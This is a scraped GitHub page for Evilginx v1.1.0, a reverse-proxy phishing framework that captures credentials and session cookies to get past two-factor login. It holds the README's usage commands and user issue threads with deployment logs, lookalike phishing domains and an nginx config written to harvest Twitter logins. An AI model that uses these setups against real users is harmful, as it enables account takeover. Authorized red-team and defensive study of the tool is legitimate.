kgretzky / evilginx Goto Github PK

View Code? Open in Web Editor NEW

1.1K 84.0 259.0 66 KB

PLEASE USE NEW VERSION: https://github.com/kgretzky/evilginx2

License: MIT License

Python 83.25% Shell 16.16% Dockerfile 0.59%

evilginx's Introduction

Evilginx v.1.1.0

THIS VERSION IS OBSOLETE. PLEASE USE THE LATEST VERSION!

EVILGINX 2: https://github.com/kgretzky/evilginx2

Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It's core runs on Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content, while intercepting traffic between client and server.

You can learn how it works and how to install everything yourself on my blog:

First post slightly outdated now: Evilginx - Advanced Phishing With Two-factor Authentication Bypass

Evilginx 1.0 Update: Evilginx 1.0 Update - Up Your Game in 2FA Phishing

Evilginx 1.1 Update: Evilginx 1.1 Update

Disclaimer

I am aware that Evilginx can be used for very nefarious purposes. This work is merely a demonstration of what adept attackers can do. It is the defender's responsibility to take such attacks into consideration, when setting up defenses, and find ways to protect against this phishing method. Evilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.

Contributors Hall of Fame

@poweroftrue

Installation

Evilginx provides an installation script install.sh that takes care of installing the whole package on any Debian wheezy/jessie machine, in fire and forget manner.

git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh

Usage

            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/          v1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...

positional arguments:
  {setup,parse,genurl}
    setup               Configure Evilginx.
    parse               Parse log file(s).
    genurl              Generate phishing URL.

optional arguments:
  -h, --help            show this help message and exit

Setup

Enable or disable site configurations for use with Nginx server, using supplied Evilginx templates from sites directory.

usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Your phishing domain.
  -y                    Answer all questions with 'Yes'.
  -l, --list            List available supported apps.
  --enable ENABLE       Enable following site by name.
  --disable DISABLE     Disable following site by name.

List available site configuration templates:

python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

Enable google phishing site with preregistered phishing domain not-really-google.com:

python evilginx.py setup --enable google -d not-really-google.com

Disable facebook phishing site:

python evilginx.py setup --disable facebook

Parse

Parse Nginx logs to extract intercepted login credentials and session cookies. Logs, by default, are saved in logs directory, where evilginx.py script resides. This can be done automatically after you enable auto-parsing in the Setup phase.

usage: evilginx.py parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs
                        for all sites).
  --debug               Does not truncate log file after parsing.

Parse logs only for google site:

python evilginx.py parse -s google

Parse logs for all available sites:

python evilginx.py parse -s all

Generate URL

Generate phishing URLs that you can use in your Red Team Assessments.

usage: evilginx.py genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to generate link for.
  -r REDIRECT, --redirect REDIRECT
                        Redirect user to this URL after successful sign-in.

Generate google phishing URL that will redirect victim to rick'roll video on successful login:

python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ

evilginx's People

Contributors

Stargazers

Watchers

Forkers

cys3c olivierh59500 maleus bl4ckh0l3z relotnek av1080p h1d3r pynon kaicastledine techlord-rce cryptedwolf ngankilo dhayalanb diggold y0d4a xdancho clicknull kbahaxor hiteshmahajan awesome-security 0thm4n3 johnjohnsp1 peterpt proj-xack pr3p songofhack op3n-tor aancw loveshell fnzv wisdark chaoxihailing1024 thanatoskira bemonolit kakuye lxpe puppycodes tobey123 easyguyme team-firebugs ethelhub methos2016 sage-pe pentest30 darg0001 ajay656-hash 0x43f shekkbuilder dissidentmoore poweroftrue samyoyo hooom taind94 mastonic samverneck sabriallani tbobm jack51706 ang3ll vaginessa alex-dengx wigrus kurtdegreeff sumedhaagarwal j3r1ch0 sengkyaut mrlobic tim1512 ankushgoel27 aln7 linuxdaddy signedbytes theralfbrown h0k5 farfetchedchild m41doror joseph-giron yeyintminthuhtut haxbaba mehardeep sajidkiani theotherside cerebralmischief jerusalemsbell heikipikker exploitcollection its-kangara itsenhong v1gn35h7 securitym0nk scorpioni4e testwot beanne brianelugan99 chaitanyakrishna koalazak subzeroking 0xffffe001 mmxmb prodject

evilginx's Issues

Ho can I protect my websites from this?

@kgretzky thanks for your amazing works!

I have many websites, in many technologies... I need a way to protect them.

I'm wondering if there is just something like a check of suspicious IP activities in the aftermath?

Just this? Really?

Can I check my SSL certificate? HSTS? Avoid serving my site if called from evilnginx?

CSRF protection helps in any way?

Cookies

cookies are not captured from smartphones.
the rt cookie is for only web browsers.
is there is any way to get cookies from smartphone devices too ?

Upgrade from 1.0 to 1.0.1

How to do it without reinstall all

Error enabling site config.

connection refused obtaining ssl certificates:PLEASE HELP!!

root@kali:~/Desktop/tools/evilginx# python evilginx.py setup --enable google -d authconfig-gogle.site
_ _ _
() | ()
_____ | | __ _ _ _ __ __ __
/ _ \ \ / / | |/ ` | | ' \ / /
| __/\ V /| | | (| | | | | |> <
_| _/ |||_, ||| |//_
/ |
by @Mrgretzky |/ v.1.1.0

[] Using domain: authconfig-gogle.site
[] Stopping nginx daemon...
[+] Site 'google' enabled.
[?] Do you want to automatically parse all logs every minute? [y/N] y
[+] Logs will be parsed every minute via /etc/crontab.
[?] Do you want to install LetsEncrypt SSL/TLS certificates now? [Y/n] y
[*] Getting SSL/TLS certificates for following domains:

authconfig-gogle.site
accounts.authconfig-gogle.site
ssl.authconfig-gogle.site
Saving debug log to /var/log/letsencrypt/letsencrypt.log
Plugins selected: Authenticator standalone, Installer None
Obtaining a new certificate
Performing the following challenges:
tls-sni-01 challenge for authconfig-gogle.site
tls-sni-01 challenge for accounts.authconfig-gogle.site
tls-sni-01 challenge for ssl.authconfig-gogle.site
Waiting for verification...
Cleaning up challenges
Failed authorization procedure. accounts.authconfig-gogle.site (tls-sni-01): urn:acme:error:connection :: The server could not connect to the client to verify the domain :: Connection refused, ssl.authconfig-gogle.site (tls-sni-01): urn:acme:error:connection :: The server could not connect to the client to verify the domain :: Connection refused, authconfig-gogle.site (tls-sni-01): urn:acme:error:connection :: The server could not connect to the client to verify the domain :: Connection refused

IMPORTANT NOTES:

The following errors were reported by the server:

Domain: accounts.authconfig-gogle.site
Type: connection
Detail: Connection refused

Domain: ssl.authconfig-gogle.site
Type: connection
Detail: Connection refused

Domain: authconfig-gogle.site
Type: connection
Detail: Connection refused

To fix these errors, please make sure that your domain name was
entered correctly and the DNS A/AAAA record(s) for that domain
contain(s) the right IP address. Additionally, please check that
your computer has a publicly routable IP address and that no
firewalls are preventing the server from communicating with the
client. If you're using the webroot plugin, you should also verify
that you are serving files from the webroot path you provided.
[-] Failed to obtain certificates.
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] n
[*] Starting nginx daemon...

Failed to start Nginx daemon

Installing Evilginx daemon...

Synchronizing state of nginx.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable nginx
Job for nginx.service failed because the control process exited with error code.
See "systemctl  status nginx.service" and "journalctl  -xe" for details.
[-] Failed to start Nginx daemon.

systemctl  status nginx.service
● nginx.service - The NGINX HTTP and reverse proxy server
   Loaded: loaded (/etc/systemd/system/nginx.service; enabled; vendor preset: disabled)
   Active: failed (Result: exit-code) since Thu 2017-10-12 15:54:09 EDT; 34s ago
      CPU: 3ms

Oct 12 15:54:09 aidan-laptop systemd[1]: Starting The NGINX HTTP and reverse proxy server...
Oct 12 15:54:09 aidan-laptop nginx[22458]: nginx: [emerg] dlopen() "/etc/nginx/nginx/modules/ngx_http_au
Oct 12 15:54:09 aidan-laptop nginx[22458]: nginx: configuration file /etc/nginx/nginx.conf test failed
Oct 12 15:54:09 aidan-laptop systemd[1]: nginx.service: Control process exited, code=exited status=1
Oct 12 15:54:09 aidan-laptop systemd[1]: Failed to start The NGINX HTTP and reverse proxy server.
Oct 12 15:54:09 aidan-laptop systemd[1]: nginx.service: Unit entered failed state.
Oct 12 15:54:09 aidan-laptop systemd[1]: nginx.service: Failed with result 'exit-code'.

Help please, running using Kali GNU/Linux Rolloing

Parsing problem

Hi there,
I'm usign your awesome tool to create a dropbox-like site. I setup the site and generate a URL, I navigate to the URL, logon, and get redirected(using Edge browser) to the site I specified(all cool so far).
When I try to parse the logs, I get this:

Parsing logs for site 'dropbox'...
[*] Debug mode on. Log was not truncated!
[+] Found creds: 0
[+] Found tokens: 0
In /var/log/ evilginx-dropbox.log is empty.
But if I go to /evilginx/logs/dropbox I can see the file created, 20170612_091301_0_tokens.txt, and the password is actually there.

Just tried with Facebook, with same results.

Twitter Config

Hi there,

Awesome project you got going on here!

I've been trying to setup a config for Twitter and I'm having a little trouble. I wanted to start small so right now the focus is to just capture the username and password in the POST request. Thus I've stripped anything I believe to be cookie / ssl related.

My config at the moment is this.

log_format twitter_phish '{"remote_addr":"$remote_addr","time":"$time_local","host":"$http_host","request":"$request","status":"$status","referer":"$http_referer","ua":"$http_user_agent","conn":"$connection","body":"$request_body"}';
location / {
	proxy_pass https://twitter.com/;
	proxy_cookie_domain twitter.com 192.168.60.133;
	proxy_redirect https://twitter.com/ 192.168.60.133/;
	
	sub_filter 'https://twitter.com/' '192.168.60.133/';
	sub_filter_once off;
	sub_filter_types *;

	proxy_set_header Accept-Encoding "";
	proxy_set_header X-Real-IP $remote_addr;
	proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

	access_log /var/log/evilginx-twitter.log twitter_phish;
}

As you've probably noticed, I don't have a domain setup yet so I'm using a VM's IP to substitute.

I can successfully proxy Twitter. The error happens after I try to login. A request is sent to https://twitter.com/sessions to validate the form data and in /var/log/evilginx-twitter.log I can see the credentials. https://twitter.com/sessions is supposed to redirect me to twitter.com after validation but I get a proxied 404 error. My browser tried to make a request to 192.168.60.133/192.168.60.133/sessions and that is what I see in my address bar.

I think I might be using the sub_filter directive incorrectly or perhaps I'm not understanding the proxy. Would I need another config to handle requests/redirects to https://twitter.com/sessions or I not doing something right?

Regards

evilginx_parser

python /root/tools/evilginx/evilginx_parser.py -i /var/log/evilginx-google.log -o /tmp/logs -c google.creds -x
[-] creds config corrupted.

error when running evilginx.py

Just installed evilginx and when i try to run it i get this error:

I can tell that i am missing some files, can you help me fix this please?

live config

hello, thank you for really helpful update. there is a problem with login.live.com. i tried many things but as you can see we have some problems in headers that proxy send to live.com.
this is what proxy sends:
OPTIONS https://login.live.com/GetCredentialType.srf?vv=1600&mkt=EN-US&lc=1033 HTTP/1.1 Host: login.live.com Connection: keep-alive Access-Control-Request-Method: POST Origin: http://login.fakelive.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Access-Control-Request-Headers: content-type, hpgact, hpgid Accept: */* Referer: http://login.fakelive.com/ Accept-Encoding: gzip, deflate, sdch, br Accept-Language: en-US,en;q=0.8
and this is what live.com send itself:
POST https://login.live.com/GetCredentialType.srf?vv=1600&mkt=EN-US&lc=1033 HTTP/1.1 Host: login.live.com Connection: keep-alive Content-Length: 130 hpgid: 0 Accept: application/json Origin: https://login.live.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 hpgact: 0 Content-type: application/json; charset=UTF-8 Referer: https://login.live.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.8 Cookie: uaid=***; MSPRequ=lt=***&co=1&id=N; MSPOK=***; CkTst=***
{"username":"@outlook.com","uaid":"","isOtherIdpSupported":false,"checkPhones":true}

there is some problems like request send as a options not a post. also some headers and body are missing. do you have any idea?
thanks a lot

syntax error near unexpected token

i fallow all the necessary steps but at the point when i tray to enable nginx i get this -

systemctl enable nginx

Loaded: error (Reason: Bad message)

-bash: syntax error near unexpected token `('
root@googlegoogIe:~# systemctl enable nginx
Failed to execute operation: Bad message

systemctl start nginx
Failed to start nginx.service: Unit nginx.service failed to load: Bad message. See system logs and 'systemctl status nginx.service' for details.

systemctl status nginx.service

● nginx.service - The NGINX HTTP and reverse proxy server
Loaded: error (Reason: Bad message)
Active: inactive (dead)

How to fid thix?

new Google sign-in page

The new Google sign-in page shows up on computers, phones, and tablets.
Now when you try login from evilginx still waiting for something ...
This morning still work, now .. no :/
I will check late if change are required on nginx config, for example on the proxy_pass

Thank's

nginx not getting started

[/etc/systemd/system/nginx.service:16] Missing

When trying to enable and start the nginx service , getting above error.

hangs up at https://*********/signin/challenge/sl/password

i've got everything up and running but when creds are entered in to site it does not redirect to the rc.
the browser just keeps waiting for response from server

Google phishing detection

Hi @kgretzky
Great project!
Quick question: Won't this trigger Google chromes phishing detection if opened with Chrome (with usage statistics, etc, enabled)?

Several errors.

Hi bro, great job on this project. Sadly i am facing some problems, i get SSL verification errors, and when i create a link, the link, it says server not found. Here i got some screenshots of the errors, maybe you can help me. Keep the good job up!

Tutorial

Hello!
Thank you for the amazing tool you are sharing with the world for free, you are doing an amazing job!
The only problem is, there are no tutorials / guides at ALL on how to use the tool. If you do not have coding knowledge, it will be almost impossible to use. There is a short documentation on how to install it, but no documentation for example; TOR browser support, .onion sites support. How to configure it, how to build a new config, etc. Please take this in consideration, a lot of people cannot really use it because of leak of knowledge.

Thank you.

RC / RT should not be readable for the victim

If you send out a link for phishing this link should consists of a domain and an ID at max:

http://my-site.com/ServiceLogin?id=1234567890

The RC and RT should be mapped in the backend to an uniq ID and not presented to the victim as this is minimizing the success rate drastically if you see an url like this:

http://my-site.com/ServiceLogin?rc=http://my-real-site.com/login&rt=Session

zlib library not found

Please can you explain to me why I keep getting this error when I run ./install.sh on terminal and how can I fix it?

/configure: error: the HTTP gzip module requires the zlib library.
You can either disable the module by using --without-http_gzip_module
option, or install the zlib library into the system, or build the zlib library
statically from the source with nginx by using --with-zlib= option.

ERROR: failed to run command: sh ./configure --prefix=/etc/nginx/nginx ...
[-] Failed to configure openresty installation.

I will really appreciate your quick response. Thanks in anticipation.

In logs i get only email, password and user-agent...

Phishing link not working after setup enabled

I get the message that this has been setup...but no link works ..resulting in no credential harvest

cant access generated url

i am noob so please help me learn
i enabled google with domain yourjjjgoogle.com
and the generated url for youtube.com
here is what i did on terminal after installing evilginx

root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...
evilginx.py: error: too few arguments
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py-h
python: can't open file 'evilginx.py-h': [Errno 2] No such file or directory
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py -h
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...

positional arguments:
  {setup,parse,genurl}
    setup               Configure Evilginx.
    parse               Parse log file(s).
    genurl              Generate phishing URL.

optional arguments:
  -h, --help            show this help message and exit
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py setup
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

usage: evilginx.py setup [-h] [-d DOMAIN] [--crt CRT] [--key KEY]
                         [--use_letsencrypt] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)
evilginx.py setup: error: one of the arguments -l/--list --enable --disable is required
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py setup -d google
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

usage: evilginx.py setup [-h] [-d DOMAIN] [--crt CRT] [--key KEY]
                         [--use_letsencrypt] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)
evilginx.py setup: error: one of the arguments -l/--list --enable --disable is required
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py setup --enable google -d yourgoogle.com
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

[*] Using domain: yourgoogle.com
[*] Stopping nginx daemon...
[+] Site 'google' enabled.
[?] Do you want to automatically parse all logs every minute? [y/N] y
[+] Logs will be parsed every minute via /etc/crontab.
[?] Do you want to install LetsEncrypt SSL/TLS certificates now? [Y/n] Y
[*] Getting SSL/TLS certificates for following domains:
 - yourgoogle.com
 - accounts.yourgoogle.com
 - ssl.yourgoogle.com
Bootstrapping dependencies for Debian-based OSes... (you can skip this with --no-bootstrap)
Ign http://extras.ubuntu.com trusty InRelease                                                                                                           
Hit http://security.ubuntu.com trusty-security InRelease            
Ign http://in.archive.ubuntu.com trusty InRelease
Hit http://security.ubuntu.com trusty-security/main Sources             
Hit http://extras.ubuntu.com trusty Release.gpg                      
Hit http://in.archive.ubuntu.com trusty-updates InRelease            
Hit http://in.archive.ubuntu.com trusty-backports InRelease                                   
Hit http://security.ubuntu.com trusty-security/restricted Sources    
Hit http://extras.ubuntu.com trusty Release                          
Hit http://in.archive.ubuntu.com trusty Release.gpg                     
Hit http://security.ubuntu.com trusty-security/universe Sources      
Hit http://extras.ubuntu.com trusty/main Sources                     
Hit http://in.archive.ubuntu.com trusty-updates/main Sources         
Hit http://security.ubuntu.com trusty-security/multiverse Sources    
Hit http://extras.ubuntu.com trusty/main amd64 Packages              
Hit http://in.archive.ubuntu.com trusty-updates/restricted Sources   
Hit http://security.ubuntu.com trusty-security/main amd64 Packages   
Hit http://extras.ubuntu.com trusty/main i386 Packages               
Hit http://in.archive.ubuntu.com trusty-updates/universe Sources     
Hit http://security.ubuntu.com trusty-security/restricted amd64 Packages
Hit http://security.ubuntu.com trusty-security/universe amd64 Packages
Hit http://in.archive.ubuntu.com trusty-updates/multiverse Sources   
Hit http://security.ubuntu.com trusty-security/multiverse amd64 Packages
Hit http://in.archive.ubuntu.com trusty-updates/main amd64 Packages  
Hit http://in.archive.ubuntu.com trusty-updates/restricted amd64 Packages
Hit http://security.ubuntu.com trusty-security/main i386 Packages    
Hit http://security.ubuntu.com trusty-security/restricted i386 Packages
Hit http://in.archive.ubuntu.com trusty-updates/universe amd64 Packages
Hit http://security.ubuntu.com trusty-security/universe i386 Packages
Hit http://security.ubuntu.com trusty-security/multiverse i386 Packages
Hit http://in.archive.ubuntu.com trusty-updates/multiverse amd64 Packages
Hit http://security.ubuntu.com trusty-security/main Translation-en   
Hit http://in.archive.ubuntu.com trusty-updates/main i386 Packages   
Hit http://security.ubuntu.com trusty-security/multiverse Translation-en
Ign http://extras.ubuntu.com trusty/main Translation-en_IN           
Hit http://in.archive.ubuntu.com trusty-updates/restricted i386 Packages
Hit http://security.ubuntu.com trusty-security/restricted Translation-en
Ign http://extras.ubuntu.com trusty/main Translation-en              
Hit http://security.ubuntu.com trusty-security/universe Translation-en
Hit http://in.archive.ubuntu.com trusty-updates/universe i386 Packages
Hit http://in.archive.ubuntu.com trusty-updates/multiverse i386 Packages
Hit http://in.archive.ubuntu.com trusty-updates/main Translation-en
Hit http://in.archive.ubuntu.com trusty-updates/multiverse Translation-en
Hit http://in.archive.ubuntu.com trusty-updates/restricted Translation-en
Hit http://in.archive.ubuntu.com trusty-updates/universe Translation-en
Hit http://in.archive.ubuntu.com trusty-backports/main Sources
Hit http://in.archive.ubuntu.com trusty-backports/restricted Sources
Hit http://in.archive.ubuntu.com trusty-backports/universe Sources
Hit http://in.archive.ubuntu.com trusty-backports/multiverse Sources
Hit http://in.archive.ubuntu.com trusty-backports/main amd64 Packages
Hit http://in.archive.ubuntu.com trusty-backports/restricted amd64 Packages
Hit http://in.archive.ubuntu.com trusty-backports/universe amd64 Packages
Hit http://in.archive.ubuntu.com trusty-backports/multiverse amd64 Packages
Hit http://in.archive.ubuntu.com trusty-backports/main i386 Packages
Hit http://in.archive.ubuntu.com trusty-backports/restricted i386 Packages
Hit http://in.archive.ubuntu.com trusty-backports/universe i386 Packages
Hit http://in.archive.ubuntu.com trusty-backports/multiverse i386 Packages
Hit http://in.archive.ubuntu.com trusty-backports/main Translation-en
Hit http://in.archive.ubuntu.com trusty-backports/multiverse Translation-en
Hit http://in.archive.ubuntu.com trusty-backports/restricted Translation-en
Hit http://in.archive.ubuntu.com trusty-backports/universe Translation-en
Hit http://in.archive.ubuntu.com trusty Release
Hit http://in.archive.ubuntu.com trusty/main Sources
Hit http://in.archive.ubuntu.com trusty/restricted Sources
Hit http://in.archive.ubuntu.com trusty/universe Sources
Hit http://in.archive.ubuntu.com trusty/multiverse Sources
Hit http://in.archive.ubuntu.com trusty/main amd64 Packages
Hit http://in.archive.ubuntu.com trusty/restricted amd64 Packages
Hit http://in.archive.ubuntu.com trusty/universe amd64 Packages
Hit http://in.archive.ubuntu.com trusty/multiverse amd64 Packages
Hit http://in.archive.ubuntu.com trusty/main i386 Packages
Hit http://in.archive.ubuntu.com trusty/restricted i386 Packages
Hit http://in.archive.ubuntu.com trusty/universe i386 Packages
Hit http://in.archive.ubuntu.com trusty/multiverse i386 Packages
Hit http://in.archive.ubuntu.com trusty/main Translation-en
Hit http://in.archive.ubuntu.com trusty/multiverse Translation-en
Hit http://in.archive.ubuntu.com trusty/restricted Translation-en
Hit http://in.archive.ubuntu.com trusty/universe Translation-en
Ign http://in.archive.ubuntu.com trusty/main Translation-en_IN
Ign http://in.archive.ubuntu.com trusty/multiverse Translation-en_IN
Ign http://in.archive.ubuntu.com trusty/restricted Translation-en_IN
Ign http://in.archive.ubuntu.com trusty/universe Translation-en_IN
Reading package lists... Done
Reading package lists... Done
Building dependency tree       
Reading state information... Done
gcc is already the newest version.
python is already the newest version.
python-dev is already the newest version.
augeas-lenses is already the newest version.
ca-certificates is already the newest version.
libaugeas0 is already the newest version.
libffi-dev is already the newest version.
libssl-dev is already the newest version.
openssl is already the newest version.
python-virtualenv is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 738 not upgraded.
Creating virtual environment...
Installing Python packages...
Installation succeeded.
Saving debug log to /var/log/letsencrypt/letsencrypt.log
Plugins selected: Authenticator standalone, Installer None
Registering without email!
Obtaining a new certificate
Performing the following challenges:
http-01 challenge for yourgoogle.com
http-01 challenge for accounts.yourgoogle.com
http-01 challenge for ssl.yourgoogle.com
Cleaning up challenges
Problem binding to port 80: Could not bind to IPv4 or IPv6.

IMPORTANT NOTES:
 - Your account credentials have been saved in your Certbot
   configuration directory at /etc/letsencrypt. You should make a
   secure backup of this folder now. This configuration directory will
   also contain certificates and private keys obtained by Certbot so
   making regular backups of this folder is ideal.
[-] Failed to obtain certificates.
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] y
[+] Setting all SSL/TLS certificates to be auto-renewed via /etc/crontab.
[*] Starting nginx daemon...

root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py genurl -s google -r https://youtube.com
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

Generated following phishing URLs:

 : https://accounts.yourgoogle.com/ServiceLogin?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ
 : https://accounts.yourgoogle.com/signin/v2/identifier?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ

root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py setup --enable google -d yourjjjgoogle.com
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

[*] Using domain: yourjjjgoogle.com
[*] Stopping nginx daemon...
[+] Site 'google' enabled.
[?] Do you want to automatically parse all logs every minute? [y/N] N
[?] Do you want to install LetsEncrypt SSL/TLS certificates now? [Y/n] N
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] N
[*] Starting nginx daemon...

root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py genurl -s google -r https://youtube.com
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

Generated following phishing URLs:

 : https://accounts.yourjjjgoogle.com/ServiceLogin?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ
 : https://accounts.yourjjjgoogle.com/signin/v2/identifier?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ

root@pulkitserver:/home/pulkit/Desktop/evilginx#

Credentials not Parsed

Hi, i have successfully phished the user and i have got user credentials and session tokens but when i am trying it to parse it i am getting this error

i have both credentials and session token file in Linkedin logs directory

Compile error using latest OpenSSL

I get this error while compiling with the latest version of OpenSSL

src/event/ngx_event_openssl.c: In function ‘ngx_ssl_connection_error’: src/event/ngx_event_openssl.c:2048:21: error: ‘SSL_R_NO_CIPHERS_PASSED’ undeclared (first use in this function) || n == SSL_R_NO_CIPHERS_PASSED /* 182 */ ^~~~~~~~~~~~~~~~~~~~~~~ src/event/ngx_event_openssl.c:2048:21: note: each undeclared identifier is reported only once for each function it appears in objs/Makefile:1092: recipe for target 'objs/src/event/ngx_event_openssl.o' failed make[2]: *** [objs/src/event/ngx_event_openssl.o] Error 1

Version of OpenSSL:
Package: libssl-dev
Source: openssl
Version: 1.1.0e-1

Is there anyway I can compile using the older version which is supported?

not working

i setup evilginx smoothly. i have nginx server actively running. i was testin it on my remote desktop server.but when i run the setup of the weblink eg google and genurl it generates the url. when i click it shows empty page not found. i use vps with my native ip of the vps.for testing , when open link on my local vmware , it shows empty errror page

Yahoo support

Hi,

Would appreciate if you can add a yahoo config to the templates.

Can you also do a tutorial on adding our own configs for sites?

Getting evilginx working on Kali Linux

Hi there, juz wanted to share my way of trying to install evilginx on Kali Linux. What have I overcome and with what I'am still having problems with.

Issues:

Lack of zlib library
solution: apt install zlib1g-dev
Location and then versions of the modules (prevents nginx from starting)
`
root@kali:~/evilginx#
systemctl status nginx.service
● nginx.service - The NGINX HTTP and reverse proxy server
Loaded: loaded (/etc/systemd/system/nginx.service; enabled; vendor preset: disabled)
Active: failed (Result: exit-code) since Sun 2017-10-15 12:31:22 EDT; 15s ago
Process: 25771 ExecStartPre=/usr/sbin/nginx -t (code=exited, status=1/FAILURE)

Oct 15 12:31:22 kali systemd[1]: Starting The NGINX HTTP and reverse proxy server...
Oct 15 12:31:22 kali nginx[25771]: nginx: [emerg] module "/etc/nginx/nginx/modules/ngx_http_auth_pam_module.so" version 1013005 instead of 1011002 in /etc/nginx/modules-enabled/50-mod-http-auth-pam.conf:1
Oct 15 12:31:22 kali nginx[25771]: nginx: configuration file /etc/nginx/nginx.conf test failed
Oct 15 12:31:22 kali systemd[1]: nginx.service: Control process exited, code=exited status=1
Oct 15 12:31:22 kali systemd[1]: Failed to start The NGINX HTTP and reverse proxy server.
Oct 15 12:31:22 kali systemd[1]: nginx.service: Unit entered failed state.
Oct 15 12:31:22 kali systemd[1]: nginx.service: Failed with result 'exit-code'.
`
solution: At first I just searched for missing modules and made symbolic links to where nginx was looking for them but as You can see that didn't solve the problem as after links were created modules version issue occured :/ Tried to check nginx.conf for any suggestions of module versions validation and how to disable it but failed. Any suggestions? (Sorry for mistakes, this is my first post)

